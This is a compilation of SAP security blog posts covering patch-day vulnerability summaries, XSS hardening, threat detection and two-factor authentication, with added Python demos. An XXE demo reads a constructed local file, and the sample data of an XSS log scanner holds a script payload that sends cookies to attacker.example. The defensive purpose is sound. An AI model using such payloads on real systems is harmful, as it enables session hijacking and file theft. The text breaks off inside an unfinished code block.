
Security


It is not so rare to face the "Error while creating PSE" (TRUST040) when trying to create the SNC SAPCryptolib PSE in an SAP NetWeaver AS ABAP environment. This can be caused by missing corrections (see SAP Notes 1740744, 1756908 and 2198198). However, these corrections are not the most common cause of the error.

 

More often, customers see this error because their environment is not configured to use SAPCryptolib or CommonCryptoLib as the SNC product. In that case the "Error while creating PSE" (TRUST040) when trying to create the SNC SAPCryptolib PSE is expected and correct behaviour.

 

Customers can verify which SNC product is configured in their environment by checking the profile parameter snc/gssapi_lib. The most common scenario is that it points to a Kerberos library; in that case the SNC PSE cannot be created, because the Kerberos library does not use the SNC SAPCryptolib PSE.

 

 

In other words, what is important to remember is:

=> If the customer's environment does not use SAPCryptolib or CommonCryptoLib as its SNC product, there is no need to maintain the SNC SAPCryptolib PSE. The name "SNC SAPCryptolib PSE" already indicates that this PSE only has to be (and can be) created when SAPCryptolib or CommonCryptoLib is used for SNC. Kerberos libraries and other external SNC products do not require such a PSE.

With SAP GRC's new product offering, SAP Dynamic Authorization Management, security administrators can solve complex access control requirements with the help of attributes. Consider a requirement like the one below.

 

 

[Image: example of a multi-attribute access control requirement]

  

Taking all the different components (N) into consideration when making an access control decision is complex. Roles alone cannot handle the above requirement, and if you choose the route of customization, I would say good luck!

 

 

With SAP Dynamic Authorization Management, we can take a practically unlimited number of conditions into consideration when making access control decisions. So the next time there is a complex security requirement, you know that there is a product out there that can handle it.

 

For how it works, please refer to the SAP DAM solution brief at the link below:

http://www.sap.com/pc/analytics/governance-risk-compliance/software/access-control-authorization-mgmt/index.html

 

-Anand Kotti

SAP has released the monthly critical patch update for August 2015. This patch update closes 22 vulnerabilities in SAP products, 15 of which have high priority; some of them belong to the SAP HANA security area. The most common vulnerability type is Cross-Site Scripting (XSS). This month, three vulnerabilities found by ERPScan researchers Dmitry Chastuhin, Vahagn Vardanyan and Roman Bejan were closed.

 

Issues that were patched with the help of ERPScan


Below are the details of SAP vulnerabilities that were found by ERPScan researchers.

 

  • An XML eXternal Entity (XXE) vulnerability in SAP Mobile Platform 2.3 (CVSS Base Score: 4.9). Update is available in SAP Security Note 2152227. An attacker can send a specially crafted XML request containing an external entity declaration; when the XML parser resolves the entity, the attacker gains unauthorized read access to the OS file system.
  • An XML eXternal Entity (XXE) vulnerability in SAP NetWeaver Portal (CVSS Base Score: 4.9). Update is available in SAP Security Note 2168485. The attack is the same as above: a crafted XML request with an external entity that the parser resolves, giving unauthorized read access to the OS file system.
  • An XSS vulnerability in SAP Afaria 7 (CVSS Base Score: 4.3). Update is available in SAP Security Note 2152669. An attacker can modify displayed application content without authorization and steal authentication data (cookies).
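Both XXE issues above come down to one thing: an XML parser that resolves external entities declared in the document. The following is an added example, not code from the original post or from SAP: using only the Python standard library, it shows how an entity declared in a document's internal DTD subset pulls a local file into the parsed content when entity resolution is on, and two ways to harden the parse. The "secret" file, its contents and the XML documents are constructed for the demo.

```python
"""Added example, not code from the original post: demonstrates why an XML
parser that resolves external entities (XXE) can hand an attacker the contents
of a local file, and two hardening options.  Uses only the Python standard
library; the "secret" file and the XML documents are constructed for the demo."""
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import feature_external_ges


class _TextCollector(xml.sax.ContentHandler):
    """Collects all character data the parser delivers."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)


def parse_text(document: str, resolve_external_entities: bool) -> str:
    """Parse the document and return its text content.  The flag stands for
    the parser setting an insecure deployment leaves enabled."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = _TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(document.encode("utf-8")))
    return "".join(handler.parts)


def make_demo_document():
    """Write a constructed 'secret' file and build the attacker's document:
    an internal DTD subset declaring an external entity that points at it."""
    fd, path = tempfile.mkstemp(prefix="xxe-demo-", suffix=".properties")
    with os.fdopen(fd, "w") as f:
        f.write("db.user=SAPHANADB\ndb.password=constructed-secret\n")
    document = (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE request [<!ENTITY xxe SYSTEM "{path}">]>\n'
        "<request><id>&xxe;</id></request>\n"
    )
    return path, document


def safe_parse_text(document: str) -> str:
    """Hardened entry point: refuse any DOCTYPE (so no entity declarations at
    all) and parse with external entity resolution switched off."""
    if "<!DOCTYPE" in document:
        raise ValueError("DOCTYPE declarations are not accepted")
    return parse_text(document, resolve_external_entities=False)


if __name__ == "__main__":
    secret_path, doc = make_demo_document()
    print("vulnerable parser :", repr(parse_text(doc, True)))
    print("entities disabled :", repr(parse_text(doc, False)))
    try:
        safe_parse_text(doc)
    except ValueError as err:
        print("hardened parser   : rejected -", err)
    os.remove(secret_path)
```

Run it and compare the three lines: the vulnerable parse returns the file content inside the id element, the parse with external entities disabled returns nothing for the entity reference, and the hardened entry point refuses the document outright because it carries a DOCTYPE. The same two controls apply to any XML consumer, whatever the language: disable DTD processing, or at least external entity resolution, in the parser you actually use.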

 

The most critical issues found by other researchers


Some of our readers and clients asked us to categorize the most critical SAP vulnerabilities to patch them first. Companies providing SAP Security Audit, SAP Security Assessment, or SAP Penetration Testing services can include these vulnerabilities in their checklists. The most critical vulnerabilities of this update can be patched by the following SAP Security Notes:

 

  • 2037304: SAP ST-P has a Remote Command Execution vulnerability (CVSS Base Score: 8.5). An attacker can use it to run commands remotely; the commands run with the privileges of the service that executes them. This lets an attacker access arbitrary files and directories in the SAP server file system, including application source code, configuration and critical system files, and so obtain critical technical and business-related information stored in the vulnerable SAP system. It is recommended to install this SAP Security Note to prevent risks.
  • 2169391: SAP NetWeaver AFP Servlet has a Reflected File Download vulnerability (CVSS Base Score: 7.5). In an RFD attack, the user follows a malicious link to a trusted domain and the response is delivered as a file download from that domain; a victim who runs the downloaded file gives the attacker code execution on their machine. It is recommended to install this SAP Security Note to prevent risks.
  • 2175928: SAP HANA has a Running Process Remote Termination vulnerability (CVSS Base Score: 6.8). An attacker can use this vulnerability to terminate the process of a vulnerable component, making the service unavailable, with a negative impact on business processes (system downtime) and business reputation. It is recommended to install this SAP Security Note to prevent risks.
  • 2165583: SAP HANA has an incorrect system configuration vulnerability (CVSS Base Score: 6.6). SAP HANA internal services can be accessed without authentication if the HANA system is insecurely configured and no other security measures are in place. This could endanger system availability, data confidentiality and integrity. It is recommended to install this SAP Security Note to prevent risks.

 

It is highly recommended to patch all those SAP vulnerabilities to prevent business risks affecting your SAP systems.

 

As usual, SAP has thanked the ERPScan security researchers for the vulnerabilities they found on its acknowledgment page.

Hello, dear readers,

Recently we finished our series of articles on how to secure SAP systems from XSS vulnerabilities. Given the success of the previous series, I decided to launch another series called "SAP Security for CISOs". You don't need to be a CISO to benefit from these articles: they are a great starting point for everybody who is into security, wants to know more about the emerging topic of SAP Security, and doesn't know where to begin. The series will provide a step-by-step dive into the SAP Security area for those who have just started this amazing adventure. I will try to keep it less technical than usual so that everybody can understand the basics. So, all CISOs, security engineers, administrators, security consultants, penetration testers, researchers and even Basis teams are welcome.

 

First of all, let me introduce myself and my story of growing from security researcher, pentester and consultant to SAP Security expert; I think it may help you on your way to becoming an expert in this field too.

 

My experience in SAP Security started in early 2007. At that time, I was an intern penetration tester at a consulting company, and in my free time I was writing a book about Oracle Database security. The book was almost finished and I was looking to dive into another security area, something as complex as database security or even more so, when a sheer coincidence helped me understand what I would do in the future and have been doing ever since.

 

During a penetration test of a large oil company, there was a server in our scope called SAP. At that time I was not aware of these systems and their security; for me it was just yet another box which I needed to exploit, get access to the OS, take a screenshot with root access and include it in the report along with hundreds of other servers. I also hoped that access to this server would give me information such as usernames or even passwords with which I could try to access the Domain Controller, the main target for this project as for most similar projects.

 

When all the traditional tests (OS vulnerabilities, SSH brute force, public exploits for different services, and other typical ways to get unauthorized access) did not succeed, I tried to find some information about this system (which apparently was SAP ERP) from public sources. Unfortunately (or fortunately), there was almost nothing in the SAP Security area except some articles about Segregation of Duties. All that could be found was information about how to configure a user account so that it cannot execute two critical actions such as creating a payment order and then approving it. There was nothing about how an attacker could get access to SAP without having any rights, or how to analyze whether such vulnerabilities exist in a system. There was almost no information about public vulnerabilities except a couple of buffer overflows, again without any working exploit examples. So I decided to explore this system myself, as I already had experience in discovering 0-day vulnerabilities in Oracle Database and in dozens of web applications and CMS systems. Surprisingly, it took me 15 minutes to find a 0-day vulnerability in this system and get full access to SAP. At that moment it was just another "box" which I needed to "pwn"; the real understanding came later.

 

When we presented the results to management, they were very surprised that we were able to break such an important system, that it was quite easy to do, and that the system stored all the mission-critical data of their company. After that, I realized that the SAP system was something very critical for every company and that, surprisingly, nobody cared about its security, and I decided that I definitely should learn more about it.

 

Later on, I found out that it was an ERP system (Enterprise Resource Planning). According to Wikipedia, ERP is an integrated computer-based system used to manage internal and external resources, including tangible assets, financial resources, materials, and human resources. I also understood that all business processes of an enterprise are generally contained in ERP systems. Any information an attacker, be it a cybercriminal, industrial spy or competitor, might want is stored in the company's ERP: financial data, customer or public relations data, intellectual property, personally identifiable information and more. Industrial espionage, sabotage, fraud or insider embezzlement can be very effective when targeted at the victim's ERP system and can cause significant damage to the business.

 

But ERP is just one example; there are other systems that also store and process critical data, and they are also developed by SAP. The most popular are provided in SAP Business Suite, which consists of ERP, CRM, SRM, PLM and SCM. Of course, SAP is not the only vendor that develops these types of products, but it is definitely the market leader. Oracle has a number of systems with similar functionality, such as Oracle E-Business Suite, Oracle JDE and Oracle PeopleSoft, and there are less popular systems such as Microsoft Dynamics or Infor. Some companies have all their business applications based on SAP, while others use a crazy mix of solutions from different vendors, which, by the way, is very hard to manage.

 

All these large enterprise applications are connected with each other like a spider's web. That is not surprising: if you want to automate business processes, you have to connect different applications. For example, if you want to automatically generate an invoice in an SAP system and send money to a particular bank account via a banking system, you need to connect the ERP and the banking system. In reality there are dozens of connections of this type, and all of them can be critical in terms of security. Most importantly, these systems are connected not only inside the corporate network but also with partner networks or with other providers such as banks or insurance companies via the internet. Some of them are connected directly to the ICS/SCADA network, and unauthorized access to them can lead to industrial sabotage.

 

After I saw this whole new world of business applications, a world which was totally closed to most security experts, I understood the main idea: "Why would any smart attacker be interested in hacking the Domain Controller, network equipment or workstations, where defenses are becoming smarter, if it is much easier to directly target enterprise business applications, which have next to no security but provide the easiest way to commit fraud within a couple of mouse clicks?" This idea completely changed my conception of infrastructure security. It is these systems that store and process all the critical data, and we should protect them first, while nowadays it is often the other way around.

This post by the SAP Product Security Response Team shares information on Patch Day Security Notes* that are released on the second Tuesday of every month and fix vulnerabilities discovered in SAP products. SAP strongly recommends that customers visit the Support Portal and apply the patches with priority to protect their SAP landscapes.

 

On 11th of August 2015, SAP Security Patch Day saw the release of 22 security notes. Additionally, there are 4 updates to previously released Patch Day Security Notes.

____________________________________________________________________________________

 

Security Notes vs Vulnerability Type - August 2015


Security Notes vs Priority Distribution (Mar - August 2015)**


* Patch Day Security Notes are all notes that appear under the category "Patch Day Notes" in the SAP Support Portal.

** Any Patch Day Security Note released after the second Tuesday will be accounted for in the following SAP Security Patch Day.


To learn more about the security researchers and research companies who contributed to this month's security patches, visit the SAP Product Security Response Acknowledgement Page.


Do write to us at secure@sap.com with all your comments and feedback on this blog post.

 

Yours,

SAP Product Security Response Team

The Black Hat USA conference, held in Las Vegas, is one of the biggest technical IT security conferences in the world, making it one of the most relevant events of the year for the IT security community. In addition to being a place to discuss and learn about many new attacks and novel security techniques, it is the place to get a deep understanding of security best practices via trainings and security research presentations.


The Pwnie Awards, held every year during Black Hat, are a way for organizations and individuals to get recognition for the importance and impact of the critical vulnerabilities they have discovered.


Last Wednesday, the Pwnie Awards recognized an SAP vulnerability as the most important server-side vulnerability of the year: a flaw in a compression algorithm that is widely used across many SAP products (see SAP Security Notes 2124806, 2121661, 2127995 and 2125316), discovered by researcher Martin Gallo.

 

It is the first year that this award has gone to an SAP security vulnerability. This is yet another proof point of the increased importance of SAP cybersecurity to the security community, but also of the importance for SAP customers of securing their SAP implementations by applying patches, configuring the systems properly and monitoring them for security risks.


We have been helping SAP, working with the Product Security Response and HANA Security teams, by reporting security vulnerabilities that are later fixed and then patched by customers through their patch management processes. If your company's SAP implementations are falling behind on patches and security configuration, you should know that every month SAP releases new patches addressing vulnerabilities that could expose these applications.


SAP Security is more than Segregation of Duties and authorizations. Take a holistic approach to SAP cybersecurity by including it in your agenda and making it a priority across your organization, to avoid risking unauthorized access to your most critical information and business processes.

There are a lot of things to like about the latest version of SAP Enterprise Threat Detection. In this blog I am going to introduce one of the more subtle improvements – semantic events.

 

Semantic Events

Take a look at the screenshot and compare the two filter paths. Can you guess what each does?

[Screenshot: two filter paths, Path1 on the raw Event ID AU2 and Path2 on the semantic event "User, logon, failure, dialog"]

If you are intimate with the Security Audit Log in AS ABAP, you will of course know that Event ID AU2 indicates that a user attempted a dialog logon and failed. If that log type is less familiar to you, I suspect you would rather deal with the semantic event "User, logon, failure, dialog".

 

Usability is not the only difference, though. In the screenshot, both paths found the same event because the failed logon took place in an ABAP system. But because it uses the semantic event, Path2 is not restricted to events from ABAP systems: the same pattern also matches failed dialog logons reported by other system types. That is why many of the attack detection patterns delivered in SP02 are now based on semantic events, to broaden their applicability.
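The difference between the two paths is easiest to see in code. The following is an added example, not SAP Enterprise Threat Detection code: a toy normaliser that maps system-specific log records onto semantic events of the form (actor, action, outcome, channel), and one detection pattern written once against those semantic events. The ABAP mapping follows the Security Audit Log event IDs AU2 (logon failed) and AU1 (logon successful); the "JAVA" source, its message codes and all the sample records are constructed stand-ins, not a real SAP log format.

```python
"""Added example; not SAP Enterprise Threat Detection code.  A toy log
normaliser that maps system-specific log records onto semantic events such as
("User", "logon", "failure", "dialog"), and a detection pattern written once
against those semantic events.  The ABAP mapping follows Security Audit Log
event IDs AU1 (logon successful) and AU2 (logon failed); the "JAVA" source and
its codes are a constructed stand-in for a non-ABAP log, not a real format."""
from collections import defaultdict, deque
from typing import Dict, List, NamedTuple, Optional, Tuple


class SemanticEvent(NamedTuple):
    timestamp: int     # seconds on a constructed sample clock
    system: str        # SID of the system that logged the event
    system_type: str   # "ABAP" or "JAVA"
    user: str
    actor: str         # "User"
    action: str        # "logon"
    outcome: str       # "success" or "failure"
    channel: str       # "dialog"


# System-specific event codes -> (action, outcome, channel)
ABAP_SAL_EVENTS = {
    "AU1": ("logon", "success", "dialog"),   # Security Audit Log: logon successful
    "AU2": ("logon", "failure", "dialog"),   # Security Audit Log: logon failed
}
JAVA_EVENTS = {                                # hypothetical, constructed codes
    "LOGIN_OK": ("logon", "success", "dialog"),
    "LOGIN_FAILED": ("logon", "failure", "dialog"),
}
EVENT_TABLES = {"ABAP": ABAP_SAL_EVENTS, "JAVA": JAVA_EVENTS}

FAILED_DIALOG_LOGON = ("User", "logon", "failure", "dialog")

# Constructed sample records, one dict per raw log entry (not real traffic)
SAMPLE_RECORDS = [
    {"ts": 100, "system": "PRD", "type": "ABAP", "code": "AU2", "user": "JSMITH"},
    {"ts": 115, "system": "EP1", "type": "JAVA", "code": "LOGIN_FAILED", "user": "JSMITH"},
    {"ts": 130, "system": "PRD", "type": "ABAP", "code": "AU2", "user": "JSMITH"},
    {"ts": 140, "system": "PRD", "type": "ABAP", "code": "AU1", "user": "ADAMS"},
    {"ts": 400, "system": "PRD", "type": "ABAP", "code": "AU2", "user": "ADAMS"},
]


def normalise(record: Dict) -> Optional[SemanticEvent]:
    """Map one raw record onto a semantic event; unknown codes are dropped."""
    table = EVENT_TABLES.get(record["type"], {})
    if record["code"] not in table:
        return None
    action, outcome, channel = table[record["code"]]
    return SemanticEvent(record["ts"], record["system"], record["type"],
                         record["user"], "User", action, outcome, channel)


def failed_logon_alerts(events, threshold: int = 3, window_s: int = 60):
    """Pattern: at least `threshold` failed dialog logons for one user within
    `window_s` seconds, counted across every system that reports them."""
    recent: Dict[str, deque] = defaultdict(deque)
    alerts: List[Tuple[str, int, List[str]]] = []
    for ev in sorted(events, key=lambda e: e.timestamp):
        if (ev.actor, ev.action, ev.outcome, ev.channel) != FAILED_DIALOG_LOGON:
            continue
        window = recent[ev.user]
        window.append(ev)
        while ev.timestamp - window[0].timestamp > window_s:
            window.popleft()
        if len(window) >= threshold:
            alerts.append((ev.user, len(window), sorted({e.system for e in window})))
            window.clear()
    return alerts


def semantic_path(records):
    """Path2 from the post: every source is normalised, then the pattern runs."""
    return failed_logon_alerts(e for e in map(normalise, records) if e)


def abap_only_path(records):
    """Path1 from the post: filter on the raw ABAP Event ID AU2 only, so
    failures reported by non-ABAP systems never reach the pattern."""
    return failed_logon_alerts(normalise(r) for r in records
                               if r["type"] == "ABAP" and r["code"] == "AU2")


if __name__ == "__main__":
    print("semantic events :", semantic_path(SAMPLE_RECORDS))
    print("raw AU2 only    :", abap_only_path(SAMPLE_RECORDS))
```

abap_only_path corresponds to Path1 in the screenshot: it filters on the raw Event ID AU2, so the failure reported by the Java system EP1 never reaches the pattern and the threshold of three is not met. semantic_path corresponds to Path2: all three failures for JSMITH normalise to the same semantic event, and one alert is raised listing both systems.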

 

Relevant SAP Notes

2139392 - Release Note SAP Enterprise Threat Detection 1.0 SP02

When you see this error in the system log, it means that report RSUSR003 ran at that time and detected a security violation.

 

The first step is to ensure that note 1451760 is applied in the system.

 

If the error persists even though note 1451760 has been implemented, there is a real security risk.

 

Run report RSUSR003 and check the "Password Status" column. If any record is shown with a red background, change that user's password to something that is not well known and cannot be guessed easily.

 

After all records with a coloured background have been eliminated, "Security check passed" appears in the system log when RSUSR003 runs, meaning there is no security risk for the standard users.

 

In some systems, you may find that RSUSR003 runs automatically even though nobody scheduled it.

This is because during EarlyWatch Alert (EWA) data collection, the collection program calls RSUSR003 to collect the password status of the standard users.

 

Relevant notes/KBAs:

 

1451760 SUIM | RSUSR003 - inappropriate security violation message

 

863362 Security checks in SAP EarlyWatch Alert, EarlyWatch and GoingLive sessions

 

1610103 EarlyWatch Alert Report : section Default Password of Standard Users

Today's post is the last in the series of articles about XSS vulnerabilities in SAP systems. The previous parts described how to prevent XSS in SAP NetWeaver ABAP and SAP NetWeaver J2EE.

 

XSS is one of the most common vulnerability classes, and its impact can range from a petty nuisance to a significant security risk, depending on the sensitivity of the data. In SAP products, 628 XSS vulnerabilities have been discovered, which is almost 22% of all vulnerabilities found in SAP products in 12 years.


From the developer’s perspective

There are several rules for protecting SAP HANA applications built with the SAPUI5 framework.

 

  • Validation of typed control properties: the SAPUI5 core validates the value of properties set by the application against the declared type of the property. This guarantees that an int is always an int, and that a sap.ui.core/CSSSize is a string representing a CSS size and cannot contain a script tag. This also applies to enumerations and control IDs. The control renderer can rely on this check when writing the HTML.
  • Escaping: use the helper methods to escape the value of a string property that is written to the HTML:
    • Use writeEscaped(oControl.getSomeStringProperty()) instead of just write(...) for writing plain text to the HTML.
    • Use writeAttributeEscaped("someHtmlProperty", oControl.getSomeStringProperty()) instead of just writeAttribute(...) for writing attributes.
    • Use jQuery.sap.escapeHTML(oControl.getSomeStringProperty()) for string properties where neither of the other two options is possible, to escape the string and then process it further.

From the administrator’s perspective

 

The administrator has to set the following parameters to improve security:

  • sessiontimeout = 900: enable a session timeout to minimize the potential attack window.
  • The HttpOnly cookie flag is enabled by default.

From incident response perspective

 

To be able to identify a real attack that exploited an XSS vulnerability (or some other web-based vulnerability), it is recommended to configure the following parameters.

 

  • To monitor all HTTP(S) requests processed by an SAP HANA system, you can set up the internal Web Dispatcher to write a standardized HTTP log for each request. To configure the Web Dispatcher to log all HTTP(S) requests, add the parameter icm/http/logging_0 with the following values:
    • LOGFILE: the path of the log file.
    • PREFIX: "/". A prefix of "/" (the root directory), or an empty prefix, means that all HTTP requests are logged. A prefix of "/Directory" means that only requests for "/Directory" and its subdirectories are logged.
    • FILEWRAP: off, so that old log files are kept for later analysis.
  • global_auditing_state = true. This auditing parameter is stored in global.ini, in the auditing configuration section. It lets you log additional information such as logons, logoffs and database requests, which can be relevant when investigating XSS attacks. You can find this setting in SAP HANA Administration Console -> Security -> Auditing Status.
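With that per-request log in place, the investigation step is to search it for attack traffic. The following is an added example, not from the original post: it scans HTTP access log lines for common reflected-XSS indicators after fully URL-decoding the request target. The log lines are constructed for this example and use Common Log Format; if your Web Dispatcher writes a different format, the line regular expression has to be adapted.

```python
"""Added example, not from the original post: scans HTTP access log lines
(such as the per-request log the Web Dispatcher writes with icm/http/logging_0)
for reflected-XSS indicators when investigating an incident.  The log lines
below are constructed in Common Log Format for this example; the indicator
list is a starting point, not a complete XSS signature set."""
import re
from typing import List, NamedTuple, Optional
from urllib.parse import unquote_plus

# Common Log Format: host ident user [time] "method target protocol" status bytes
CLF_LINE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)$'
)

# Patterns checked against the fully URL-decoded request target
XSS_INDICATORS = [
    (re.compile(r"<\s*script\b", re.I), "script tag"),
    (re.compile(r"javascript\s*:", re.I), "javascript: URL"),
    (re.compile(r"\bon[a-z]+\s*=", re.I), "inline event handler"),
    (re.compile(r"<\s*(img|svg|iframe|object)\b", re.I), "HTML injection tag"),
]

# Constructed sample log lines (not real traffic)
SAMPLE_LOG = """\
10.0.0.5 - JSMITH [12/Aug/2015:09:15:01 +0200] "GET /sap/hana/xs/app/search.xsjs?q=invoice HTTP/1.1" 200 1532
10.0.0.9 - - [12/Aug/2015:09:16:44 +0200] "GET /sap/hana/xs/app/search.xsjs?q=%3Cscript%3Enew+Image().src%3D%27http://attacker.example/%3F%27%2Bdocument.cookie%3C/script%3E HTTP/1.1" 200 2210
10.0.0.9 - - [12/Aug/2015:09:16:59 +0200] "GET /sap/hana/xs/app/profile.xsjs?name=x%22%20onmouseover%3Dalert(1)%20y%3D%22 HTTP/1.1" 200 980
10.0.0.5 - JSMITH [12/Aug/2015:09:17:30 +0200] "POST /sap/hana/xs/app/save.xsjs HTTP/1.1" 302 0
"""


class Finding(NamedTuple):
    host: str
    user: str
    time: str
    indicator: str
    decoded_target: str


def decode_target(target: str) -> str:
    """Decode percent-encoding until stable: attackers double-encode to slip
    past filters that decode only once."""
    previous = None
    while previous != target:
        previous, target = target, unquote_plus(target)
    return target


def scan_line(line: str) -> Optional[Finding]:
    """Return a Finding for the first indicator matched in one log line."""
    m = CLF_LINE.match(line)
    if not m:
        return None
    decoded = decode_target(m.group("target"))
    for pattern, label in XSS_INDICATORS:
        if pattern.search(decoded):
            return Finding(m.group("host"), m.group("user"), m.group("time"),
                           label, decoded)
    return None


def scan_log(text: str) -> List[Finding]:
    return [f for f in map(scan_line, text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(f"{finding.time} {finding.host} user={finding.user}: "
              f"{finding.indicator} in {finding.decoded_target}")
```

Two of the four sample lines are flagged: the script injection in the search parameter and the attribute breakout with an onmouseover handler. The event-handler pattern is deliberately broad and will also match harmless parameter names such as one=1, so treat hits as leads to confirm against the application's response, not as proof of a successful attack. Because PREFIX was set to "/" above, the scan covers every request path, which is what you want when you do not yet know which endpoint reflected the payload.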

Sometimes, in a special scenario, you might get an SSO issue and find that it is related to user locking.

That is, when the user is locked, SSO does not work as usual and the user gets a logon page.

 

The main point in troubleshooting such an issue is to find out the complete scenario.

Make clear which system is the SSO entry point, which system is the SSO credential issuer, and which SSO type is used between them.

 

In this case, the scenario was the following:

1. The entry point is the corporate Portal for all business.

2. There is a link pointing to an iView of another Portal (the second Portal).

    These two portals are federated portals, so the SSO type between them is Logon Ticket.

3. The second Portal uses an ABAP (BW) system as its UME data source.

 

The issue was that when a user's password got locked in the ABAP system (by many invalid password logons), the user could no longer SSO from the entry portal to the second portal.

Even though the ABAP parameter login/failed_user_auto_unlock=1 was set, the user still could not log on the next day.

 

From the logon page properties, we found that the page belonged to the second Portal, which confirmed that the issue was on the Portal/Java side, not the ABAP side.

 

Finally, the reason found was that when the user is locked (on the ABAP side), the Portal/Java system does not let the user log on via SSO.

There is a UME property that controls this: ume.logon.allow_password_locked_users_sso_login.

 

More information is in these Notes:

#1708850 - User is authenticated even though change password fails

#1900890 - Allow login of users whose password is locked via SSO

 

After setting this property, the user can log on via SSO even when the user's password is locked.

(This applies no matter whether the user is in the Java system's own data source or in an ABAP data source.)

 

(Also, the user's lock status is not changed by a logon via SSO; only a logon with the correct password changes it automatically.)

 

I hope this blog helps you troubleshoot similar issues.

*******************************************************************************************************

IMPORTANT:

The standard restriction with authorization object B_BUPA_ATT does not work correctly (transaction BP does not refresh the authorization error), so the best approach is to create the restriction with a Z authorization object and a BAdI:

*******************************************************************************************************

The BP restriction by the header field "Grouping"

 

[Screenshot: header field Grouping in transaction BP]

We will use a BAdI that performs an authority check against a Z authorization object.

The steps to follow are:

 

1. Go to SU20 and define a field ZGROUPING (this field will be used in the Z authorization object). Enter the field name and the data element:

[Screenshot: SU20, field ZGROUPING]

 

2. Next, go to SU21 and create a Z authorization object ZGROUPING using the field defined before.

[Screenshot: SU21, authorization object ZGROUPING]

 

3. Go to transaction SE19 and create an implementation of the BAdI BUPA_FURTHER_CHECKS called ZBUPA_FURTHER_CHECKS. This is where we will add the corresponding code.

[Screenshots: SE19, BAdI implementation ZBUPA_FURTHER_CHECKS]


4. Next, open the implementation ZBUPA_FURTHER_CHECKS, go to the "Interface" tab and double-click the method CHECK_CENTRAL:

[Screenshots: Interface tab and method CHECK_CENTRAL]

 

5. An editor opens where we add the corresponding AUTHORITY-CHECK (using the Z authorization object created). I used the following ABAP code:


  
AUTHORITY-CHECK OBJECT 'ZGROUPING'
  ID 'ZGROUPING' FIELD iv_group.

IF sy-subrc <> 0.
  " No authorization for this grouping: raise an error message from
  " message class ZISH_PA with text symbol 001 and the grouping value
  MESSAGE e000(zish_pa) WITH text-001 iv_group.
ENDIF.

 

[Screenshot: method CHECK_CENTRAL with the authority check]

 

6. Go to transaction PFCG and create a Z test role, adding transaction BP via the role menu (I usually add transactions XK03 and XD03 too). Complete all authorizations and add the ZGROUPING authorization object created above, restricting the values as required.

[Screenshots: PFCG role ZTEST with authorization object ZGROUPING]


In this case, the role will have access to the following groupings: ZBAN, ZDR1, ZDR2 and ZDR3.


7. Create a test user (in transaction SU01) and assign the test role ZTEST (I usually also add the standard role SAP_BC_ENDUSER to give access to basic transactions such as SU53).

 

Note: it may be necessary to generate the profile of the standard role SAP_BC_ENDUSER before assigning it.

 

[Screenshots: SU01 test user with roles ZTEST and SAP_BC_ENDUSER]

 

8. Log in with the test user and go to transaction BP to force the authorization error. Create a Business Partner for grouping ZPAT (the test user does not have access to this grouping). Then create a Business Partner for grouping ZDR1 (the user has access to this grouping) to check that the restriction works correctly.

 

[Screenshot: BP creation for grouping ZPAT rejected with an authorization error]

 

I am displaying the SU53 transaction (with the authorization error):

 

[Screenshot: SU53 showing the failed check on ZGROUPING]

 

Next, create a BP for grouping ZDR1; the user should have access:

 

[Screenshots: Business Partner created for grouping ZDR1]

 

Done. With this, we have created the required grouping restriction in transaction BP.

Do you have cloud applications for your employees or partners that you want to protect in a more secure and reliable way?

 

With SAP Cloud Identity, you can now decide which applications you want to protect better.

If you configure an application for two-factor authentication, then once the user of this application provides a valid username and password, an additional one-time password is required as the second authentication factor.

 

What is one-time password (aka OTP or passcode)?

 

It is a 6-digit passcode (for example 899866) that expires after 30 seconds. To generate passcodes, users need to install SAP Authenticator on their mobile device. It is a free mobile app available for iOS and Android.

 

Let's take a closer look at the steps you need to follow to enable two-factor authentication for your application.

 

  1. In the Administration Console for SAP Cloud Identity service, you need to open the Authentication and Access Tab for the application you want to configure.
  2. You just need to switch the slider to ON and two-factor authentication is enabled for this application. It is as simple as that.

[Screenshot: turning on two-factor authentication for an application in the Administration Console]

What are the steps for the end users?

[Diagram: end-user logon flow with two-factor authentication]

The users of the sample application "Green Holidays" need to enter the correct username and password. As a second step, they are asked to enter a passcode, after which authentication to the application succeeds.

 

First Step:

[Screenshot: username and password form]

Second Step:

[Screenshot: passcode prompt]

If the user already has a device registered to generate passcodes for two-factor authentication, he or she just has to enter the passcode shown on the mobile device and will be logged on to the application.

[Screenshot: SAP Authenticator app showing a passcode]

If the user submits 5 incorrect passcodes, the passcode is locked for 60 minutes. A tenant administrator can unlock the user's passcode manually in the Administration Console.

 

If users use the "Remember me" feature, the passcode is still required; only the first step, where users enter their credentials, is skipped.

 

How to activate a device that will generate passcodes?

 

The user needs to proceed as follows:

  1. Open the User Profile page in a web browser and press Activate under Two-Factor Authentication.
  2. Open SAP Authenticator app on a mobile device. Call the Add Account screen and scan the QR Code.
  3. Tap Add Account on your mobile device.
  4. Return to the User Profile page and enter the passcode generated by the SAP Authenticator and press Activate.

[Screenshot: activating two-factor authentication in the User Profile]

Two-factor authentication is now activated. The user can log in with a second factor to all applications from this SAP Cloud Identity tenant that require an OTP.

 

To generate the passcodes, SAP Authenticator uses the Time-based One-Time Password (TOTP) algorithm, defined as an open standard in RFC 6238.

Alternatively, you can use another application for the generation of the passcodes that is based on the same algorithm (e.g.  the Google Authenticator app).
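As an added example (not SAP Authenticator or SAP Cloud Identity code), here is a minimal RFC 6238 implementation with the parameters the post gives (6 digits, 30-second step) together with a verifier that models the lockout policy described above: 5 wrong passcodes lock the passcode for 60 minutes, and an administrator can unlock it manually. HMAC-SHA1 is the RFC's reference algorithm and the demo secret is the RFC's test secret, not a real one; the replay check, the one-step clock drift tolerance and the injectable clock are this example's own design choices.

```python
"""Added example; not SAP Authenticator or SAP Cloud Identity code.  A minimal
RFC 6238 TOTP generator with the parameters the post gives (6 digits, 30-second
step, HMAC-SHA1 as in the RFC's reference implementation) plus a verifier that
models the stated policy of locking the passcode for 60 minutes after 5 wrong
attempts.  The lockout model and the replay check are this example's own
design; the clock is injectable so the behaviour can be exercised offline."""
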